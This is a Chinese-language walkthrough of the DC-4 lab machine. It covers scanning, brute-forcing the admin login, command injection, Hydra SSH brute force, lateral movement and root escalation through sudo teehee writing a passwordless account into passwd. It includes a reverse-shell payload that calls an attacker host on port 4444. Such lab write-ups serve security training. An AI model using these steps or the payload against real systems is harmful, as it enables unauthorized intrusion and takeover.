DC-4靶机渗透

DC-4靶机渗透

直接vm打开靶机，NAT模式，nmap 扫描局域网存活的主机

发现142，直接上个全扫描
发现了开放了22 和80端口，分别对应的ssh和http服务
linux操作系统
浏览器打开网站

发现admin后台登录，这里直接用admin账号，不要问我咋知道的，直觉！
bp爆破admin的口令
拿到口令登录：

命令执行，拦截包，重放，发现没有任何过滤机制

这里只是命令中的空格被+号代替，发现除了root用户之外，还有三个用户账户

这里执行直接反弹shell
kali监听4444端口
payload：nc±c+/bin/sh+attackerip+4444
成功反弹

拿到shell，一波常规操作

发现是网站用户，没有什么权限可利用，所有还是得用其他用户权限，我直接横向到其他用户家目录里，看有什么可利用的没
发现了jim用户家目录中有个backups
看看

有个备份文件，可以根据老口令，来生成一个爆破字典
直接九头蛇怼上去

拿到口令了，理论上来说，没有穷举攻击拿不下的系统。
ssh连接：
尝试了一波sudo+git的提权，没有成功

然后看了一下mbox文件内容

这是一封邮件简介的文件，也提醒我们去查找邮件

拿到charles用户账号的口令
切换用户

看看有那些是root权限运行的二进制文件，这里可以用sudo

利用teehee创建空口令账号并加入到管理员组，这里用了一个linux系统的bug，如果账户口令为空就会以passwd这个文件为主要的依据

切换admin账号：

拿到flag！

总结：
先是admin账号爆破，进入后台，发现了命令执行，通过命令执行发现三个账户，直接反弹shell到本地，用网站用户找到其他用户的家目录，拿到了其中一个用户的oldpasswd备份文件，九头蛇爆破，成功ssh到该用户，尝试提权无果，随发现另一个账号密码的邮件，横向到另一个用户，扫描root权限执行的二进制文件，teehee创建一个空口令用户并加入到管理员组，切换用户，然后成功提权到root用户！